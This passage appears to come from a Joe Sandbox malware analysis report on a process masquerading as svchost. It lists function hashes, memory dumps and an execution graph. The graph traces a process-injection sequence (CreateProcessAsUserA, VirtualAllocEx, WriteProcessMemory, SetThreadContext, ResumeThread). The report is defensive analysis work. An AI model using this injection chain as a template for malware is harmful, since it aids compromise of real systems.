                                                                                        • Opcode Fuzzy Hash: 7bc7a5d5449dc8e312d3cecb711e8f4aa87695eb65c5430df3a5e2f9c0669c71
                                                                                        • Instruction Fuzzy Hash: 273139B0D00248DFDF14CFAAC590ADEBFF5AF48740F14842AE819AB250DB389941CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011FD3DC Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 768b119688a3c7d9403f8ff4eb9126410db031a7c796d72e67bd70b47e1b728a
                                                                                        • Instruction ID: 37bef43457755d1f8199ab97b415d66b89c6266d908b70eb2f941494fc6c4276
                                                                                        • Opcode Fuzzy Hash: 768b119688a3c7d9403f8ff4eb9126410db031a7c796d72e67bd70b47e1b728a
                                                                                        • Instruction Fuzzy Hash: C72128B1504244DFDF09DF58E9C0B66BF65FB84324F24C66DEA050B606C336E846C7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011FD4C8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 97331d48464294482abd899ae602d41c22f493af8353a9df4f2a9c8c19cad339
                                                                                        • Instruction ID: 26592816c3c801ebc12886c9dafae2b21bea73aee17a602343f434a125895689
                                                                                        • Opcode Fuzzy Hash: 97331d48464294482abd899ae602d41c22f493af8353a9df4f2a9c8c19cad339
                                                                                        • Instruction Fuzzy Hash: 4A213A71504240DFDF1ADF58E9C4B26BF75FB84728F24856DEA050B216C336D846D7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02CED1D0 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651348486.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_2ced000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85e43aacae64b478f4a83c1f79f9a15c992e51e11bc8b75780d50148b2457007
                                                                                        • Instruction ID: 3dcd4a71a2d93d2a8a3c6daf8af5b86aa53191009866bd17610b118321371811
                                                                                        • Opcode Fuzzy Hash: 85e43aacae64b478f4a83c1f79f9a15c992e51e11bc8b75780d50148b2457007
                                                                                        • Instruction Fuzzy Hash: 032104B5504240DFDF15DF54D9C0B26BBA9FB88324F24CA69E84B4B246C336DC46CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011FD3D7 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction ID: 37fffb4bdd849a45aa3111f8f8d7f82432f2d155337bd9f325e7bd18bec028e5
                                                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction Fuzzy Hash: 8511DF72404280CFCF06CF04D5C0B66BF62FB84324F28C6ADD9040BA16C33AE456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011FD4C3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction ID: 4b278a441f2cd9271ccd30be6258b2c761271d5e4b8150d20479e0e1f17335ce
                                                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction Fuzzy Hash: A611B176504280CFDF16CF54E5C4B26BF71FB84324F2486ADD9050B626C336D456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02CED1CB Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651348486.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_2ced000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction ID: a0d24ca481e4edbbe56675f14deea0debb91e6bfb99f3f6ae75603174c766cec
                                                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction Fuzzy Hash: F8119D75504280DFDF16CF14D5C4B15BBB1FB84324F28C6AED84A4B656C33AD94ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D0E51 Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23cdbac79591dfd8399b101764bcbf71cbcd8dc6984934c86921ce4efd5a97a1
                                                                                        • Instruction ID: 2d2019d780375d86aab9e74ec8c2ccfed94aece024eb73e3bbd3bc2bcff74bcb
                                                                                        • Opcode Fuzzy Hash: 23cdbac79591dfd8399b101764bcbf71cbcd8dc6984934c86921ce4efd5a97a1
                                                                                        • Instruction Fuzzy Hash: BA11A3342046148FCB62CB14C594D6AB7FAFB89324B18C59FE8498B722D731FC46CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011FD9C1 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0c8d48592ff6c175e46a147e4e8363bbf30729c00d6fb636af7c22b323763d0
                                                                                        • Instruction ID: c3aacf612f1a94982f89c42668259be06223e8496de757ac73e2916c7e6c1172
                                                                                        • Opcode Fuzzy Hash: a0c8d48592ff6c175e46a147e4e8363bbf30729c00d6fb636af7c22b323763d0
                                                                                        • Instruction Fuzzy Hash: 6601FC3250C3849AEF194A69DC84776BF98EF40774F08855EEE051E242C3749844CAB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011FD9C0 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 811c0b12314cfe29a24cc698738e52779f56caa536450a1b2070005324300319
                                                                                        • Instruction ID: 27ea124ebdd3450c8616bc2d8c3199dd9e8176fdba28512252aa556743b65317
                                                                                        • Opcode Fuzzy Hash: 811c0b12314cfe29a24cc698738e52779f56caa536450a1b2070005324300319
                                                                                        • Instruction Fuzzy Hash: BDF0C2725082849EEB158A1ADC84B62FF98EB81734F18C55EEE081F282C3789844CAB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D1550 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
                                                                                        • Instruction ID: 6a22517867a3a53444424914dfac3ff35bd0c12d595d8faada3baf711c878536
                                                                                        • Opcode Fuzzy Hash: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
                                                                                        • Instruction Fuzzy Hash: 88C048342A02088F8204DB59D484C5033A8AF48A2935100D8E5098B732CB22FC52CA80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D1530 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3176f76a3b5178d50bb2fb78170327d9da517e149dc08357df451210d3de30ab
                                                                                        • Instruction ID: 384d2b4bdbf9597e8a79542763785c7cf21ed74b7da1ddbaff035bc9b8b037a3
                                                                                        • Opcode Fuzzy Hash: 3176f76a3b5178d50bb2fb78170327d9da517e149dc08357df451210d3de30ab
                                                                                        • Instruction Fuzzy Hash: F9C092342A0208CFC648DF59D484C5073ACFF48A1936100D9E9098B732CB32FC02CA90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:23.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:79
                                                                                        Total number of Limit Nodes:3
                                                                                        execution_graph 3822 54a0448 3823 54a044e 3822->3823 3824 54a0458 3823->3824 3827 54a1eb8 3823->3827 3833 54a1ef7 3823->3833 3828 54a1ec6 3827->3828 3830 54a1f18 3827->3830 3828->3828 3829 54a1f32 3829->3824 3838 54a3658 3830->3838 3842 54a3668 3830->3842 3835 54a1f02 3833->3835 3834 54a1f32 3834->3824 3836 54a3658 13 API calls 3835->3836 3837 54a3668 13 API calls 3835->3837 3836->3834 3837->3834 3839 54a3668 3838->3839 3839->3829 3840 54a368b 3839->3840 3846 54a49ac 3839->3846 3840->3829 3843 54a3679 3842->3843 3843->3829 3844 54a368b 3843->3844 3845 54a49ac 13 API calls 3843->3845 3844->3829 3845->3843 3847 54a49b7 3846->3847 3850 54a4aea 3847->3850 3879 54a5020 3847->3879 3883 54a5014 3847->3883 3848 54a4dd9 3849 54a4e13 3848->3849 3921 54a5458 3848->3921 3925 54a5450 3848->3925 3857 54a4e30 3849->3857 3872 54a5458 SetThreadContext 3849->3872 3873 54a5450 SetThreadContext 3849->3873 3850->3848 3887 54a5518 3850->3887 3890 54a5510 3850->3890 3851 54a4e58 3851->3839 3852 54a4bc6 3894 54a5608 3852->3894 3897 54a5600 3852->3897 3853 54a4c3d 3854 54a4c7f 3853->3854 3870 54a5608 VirtualAllocEx 3853->3870 3871 54a5600 VirtualAllocEx 3853->3871 3854->3848 3901 54a56a8 3854->3901 3905 54a56b0 3854->3905 3855 54a4ca8 3856 54a4d98 3855->3856 3862 54a56a8 WriteProcessMemory 3855->3862 3863 54a56b0 WriteProcessMemory 3855->3863 3864 54a56a8 WriteProcessMemory 3856->3864 3865 54a56b0 WriteProcessMemory 3856->3865 3909 54a57e0 3857->3909 3913 54a57e8 3857->3913 3916 54a5779 3857->3916 3862->3855 3863->3855 3864->3848 3865->3848 3870->3854 3871->3854 3872->3857 3873->3857 3880 54a50ad CreateProcessAsUserA 3879->3880 3882 54a52c8 3880->3882 3882->3882 3884 54a50ad CreateProcessAsUserA 3883->3884 3886 54a52c8 3884->3886 3888 54a5560 ReadProcessMemory 3887->3888 3889 54a559d 3888->3889 3889->3852 3891 54a5518 ReadProcessMemory 3890->3891 3893 54a559d 3891->3893 3893->3852 3895 54a564b VirtualAllocEx 3894->3895 3896 54a5682 3895->3896 3896->3853 3898 54a5608 VirtualAllocEx 3897->3898 3900 54a5682 3898->3900 3900->3853 3902 54a56b0 WriteProcessMemory 3901->3902 3904 54a574c 3902->3904 3904->3855 3906 54a56fb WriteProcessMemory 3905->3906 3908 54a574c 3906->3908 3908->3855 3910 54a57e2 ResumeThread 3909->3910 3912 54a5856 3910->3912 3912->3851 3914 54a5829 ResumeThread 3913->3914 3915 54a5856 3914->3915 3915->3851 3917 54a57e2 ResumeThread 3916->3917 3918 54a5787 3916->3918 3920 54a5856 3917->3920 3918->3851 3920->3851 3922 54a54a0 SetThreadContext 3921->3922 3924 54a54de 3922->3924 3924->3849 3926 54a5458 SetThreadContext 3925->3926 3928 54a54de 3926->3928 3928->3849

                                                                                        Executed Functions

                                                                                        Function 054A5014 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 54a5014-54a50b9 2 54a50bb-54a50e0 0->2 3 54a510d-54a512f 0->3 2->3 8 54a50e2-54a50e4 2->8 6 54a5131-54a5159 3->6 7 54a5186-54a51b6 3->7 6->7 15 54a515b-54a515d 6->15 17 54a520a-54a52c6 CreateProcessAsUserA 7->17 18 54a51b8-54a51dd 7->18 9 54a50e6-54a50f0 8->9 10 54a5107-54a510a 8->10 12 54a50f2 9->12 13 54a50f4-54a5103 9->13 10->3 12->13 13->13 16 54a5105 13->16 19 54a515f-54a5169 15->19 20 54a5180-54a5183 15->20 16->10 32 54a52c8-54a52ce 17->32 33 54a52cf-54a5343 17->33 18->17 25 54a51df-54a51e1 18->25 22 54a516b 19->22 23 54a516d-54a517c 19->23 20->7 22->23 23->23 26 54a517e 23->26 27 54a51e3-54a51ed 25->27 28 54a5204-54a5207 25->28 26->20 30 54a51ef 27->30 31 54a51f1-54a5200 27->31 28->17 30->31 31->31 34 54a5202 31->34 32->33 42 54a5353-54a5357 33->42 43 54a5345-54a5349 33->43 34->28 44 54a5359-54a535d 42->44 45 54a5367-54a536b 42->45 43->42 46 54a534b 43->46 44->45 47 54a535f 44->47 48 54a537b-54a537f 45->48 49 54a536d-54a5371 45->49 46->42 47->45 51 54a5391-54a5398 48->51 52 54a5381-54a5387 48->52 49->48 50 54a5373 49->50 50->48 53 54a539a-54a53a9 51->53 54 54a53af 51->54 52->51 53->54 55 54a53b0 54->55 55->55
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 054A52B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID: U
                                                                                        • API String ID: 2217836671-3372436214
                                                                                        • Opcode ID: 590249ddbbbbce10f0ef15760ed27faffc7166374e293633f9ac3abf9acd313a
                                                                                        • Instruction ID: ddce29af2c2872459ee2fd22fe846ff44fff4648ea93630665e45d71a0265206
                                                                                        • Opcode Fuzzy Hash: 590249ddbbbbce10f0ef15760ed27faffc7166374e293633f9ac3abf9acd313a
                                                                                        • Instruction Fuzzy Hash: 27A14B72D042199FDF50DF68C9417EEBBB2FF58304F0481AAE819A7290E7749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A5779 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 57 54a5779-54a5785 58 54a57e2-54a5854 ResumeThread 57->58 59 54a5787-54a57a1 call 54a2338 57->59 66 54a585d-54a5871 58->66 67 54a5856-54a585c 58->67 67->66
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: V
                                                                                        • API String ID: 947044025-1342839628
                                                                                        • Opcode ID: e3cf8db444520cde8d7d7de00e605cd2fc19639e7447c8f9894f3f6d3b8883f9
                                                                                        • Instruction ID: 415f7ba5fc3ef9748d744e8e261d6b93c0d1175494426a1059b8366d2223cbc7
                                                                                        • Opcode Fuzzy Hash: e3cf8db444520cde8d7d7de00e605cd2fc19639e7447c8f9894f3f6d3b8883f9
                                                                                        • Instruction Fuzzy Hash: 80214AB6C00208CFCB50CF9ADA85BEEBBF4EB58320F10845AD419B7740D775AA408FA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A5020 Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 105 54a5020-54a50b9 107 54a50bb-54a50e0 105->107 108 54a510d-54a512f 105->108 107->108 113 54a50e2-54a50e4 107->113 111 54a5131-54a5159 108->111 112 54a5186-54a51b6 108->112 111->112 120 54a515b-54a515d 111->120 122 54a520a-54a52c6 CreateProcessAsUserA 112->122 123 54a51b8-54a51dd 112->123 114 54a50e6-54a50f0 113->114 115 54a5107-54a510a 113->115 117 54a50f2 114->117 118 54a50f4-54a5103 114->118 115->108 117->118 118->118 121 54a5105 118->121 124 54a515f-54a5169 120->124 125 54a5180-54a5183 120->125 121->115 137 54a52c8-54a52ce 122->137 138 54a52cf-54a5343 122->138 123->122 130 54a51df-54a51e1 123->130 127 54a516b 124->127 128 54a516d-54a517c 124->128 125->112 127->128 128->128 131 54a517e 128->131 132 54a51e3-54a51ed 130->132 133 54a5204-54a5207 130->133 131->125 135 54a51ef 132->135 136 54a51f1-54a5200 132->136 133->122 135->136 136->136 139 54a5202 136->139 137->138 147 54a5353-54a5357 138->147 148 54a5345-54a5349 138->148 139->133 149 54a5359-54a535d 147->149 150 54a5367-54a536b 147->150 148->147 151 54a534b 148->151 149->150 152 54a535f 149->152 153 54a537b-54a537f 150->153 154 54a536d-54a5371 150->154 151->147 152->150 156 54a5391-54a5398 153->156 157 54a5381-54a5387 153->157 154->153 155 54a5373 154->155 155->153 158 54a539a-54a53a9 156->158 159 54a53af 156->159 157->156 158->159 160 54a53b0 159->160 160->160
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 054A52B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 09fe3c7a6b6508d2511c1cefe5499e8045956b225604f86ff42dd73349a35d1c
                                                                                        • Instruction ID: c7b1a06150e61c81a5b8868adf2924800813098742b15b9f16c31478eab1ec61
                                                                                        • Opcode Fuzzy Hash: 09fe3c7a6b6508d2511c1cefe5499e8045956b225604f86ff42dd73349a35d1c
                                                                                        • Instruction Fuzzy Hash: B4A14A72E042199FDF50CF68C9417EEBBB2FF58304F0481AAE819A7290D7749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A56A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 162 54a56a8-54a5701 165 54a5703-54a570f 162->165 166 54a5711-54a574a WriteProcessMemory 162->166 165->166 167 54a574c-54a5752 166->167 168 54a5753-54a5774 166->168 167->168
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 054A573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: f0e97d8aff09d183cb5b547b1e44e7f3113bf9f738fefd9370fc7c79e1c0be45
                                                                                        • Instruction ID: 734d470801636dd1bcf383640f159ed001491b120bf030217e9b11fec99af196
                                                                                        • Opcode Fuzzy Hash: f0e97d8aff09d183cb5b547b1e44e7f3113bf9f738fefd9370fc7c79e1c0be45
                                                                                        • Instruction Fuzzy Hash: 0321F6B5900209DFCF10CF9AD985BDEBBF4FB48310F10842AE519A7350D778A540CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A56B0 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 170 54a56b0-54a5701 172 54a5703-54a570f 170->172 173 54a5711-54a574a WriteProcessMemory 170->173 172->173 174 54a574c-54a5752 173->174 175 54a5753-54a5774 173->175 174->175
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 054A573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 06701f0146237a8f0baff64180a6ef4957c595430cb21dde65b92c875d07bcb7
                                                                                        • Instruction ID: 2772fbb48ddac68a01293dc025a39e06fb115464529b75025ddd162cc03c34ec
                                                                                        • Opcode Fuzzy Hash: 06701f0146237a8f0baff64180a6ef4957c595430cb21dde65b92c875d07bcb7
                                                                                        • Instruction Fuzzy Hash: 4421E3B5900249DFCB10CF9AD984BDEBBF4FB48320F10842AE919A7250D778A944CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A5450 Relevance: 1.6, APIs: 1, Instructions: 61threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 177 54a5450-54a54a4 180 54a54b0-54a54dc SetThreadContext 177->180 181 54a54a6-54a54ae 177->181 182 54a54de-54a54e4 180->182 183 54a54e5-54a5506 180->183 181->180 182->183
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 054A54CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: c3eebf9db52e83e1ec64a5e55688f1bf1686c1d997873df8f83f9832027c0e4c
                                                                                        • Instruction ID: f54e13b00b22a3c745d1b0d5cd47250417609fea6a9291fdbffcc0e074284640
                                                                                        • Opcode Fuzzy Hash: c3eebf9db52e83e1ec64a5e55688f1bf1686c1d997873df8f83f9832027c0e4c
                                                                                        • Instruction Fuzzy Hash: CB21F7B2D006199FCB10CFAAC9857DEFBF4BB48721F54816AD418B7740D778A9448FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A5510 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 185 54a5510-54a559b ReadProcessMemory 188 54a559d-54a55a3 185->188 189 54a55a4-54a55c5 185->189 188->189
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 054A558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: e59dc4c6063f7ea7835881b9f905e18544127656ec26723016fecc48cd6fc5e2
                                                                                        • Instruction ID: 5ed0e0827083c968b81a6530043502873d66b1e6965e594ed8379b4361ad749f
                                                                                        • Opcode Fuzzy Hash: e59dc4c6063f7ea7835881b9f905e18544127656ec26723016fecc48cd6fc5e2
                                                                                        • Instruction Fuzzy Hash: D821F7B2900249DFCB10CF9AC984BDEBBF4FF48320F14842AE559A7250D378A644DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A5458 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 191 54a5458-54a54a4 193 54a54b0-54a54dc SetThreadContext 191->193 194 54a54a6-54a54ae 191->194 195 54a54de-54a54e4 193->195 196 54a54e5-54a5506 193->196 194->193 195->196
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 054A54CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: 303c7ff0b95a82ce42c0ff10f6c71fb369665dd075b7f3952854c3e60139f8db
                                                                                        • Instruction ID: e523f00176e610708c8aa4a21c7248e0c3ddd9bb4eb443dd1971706020e291b8
                                                                                        • Opcode Fuzzy Hash: 303c7ff0b95a82ce42c0ff10f6c71fb369665dd075b7f3952854c3e60139f8db
                                                                                        • Instruction Fuzzy Hash: F02106B2D006199FCB10CFAAC9847DEFBF4BB48720F14816AD818B7740D778A9448FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 054A5518 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
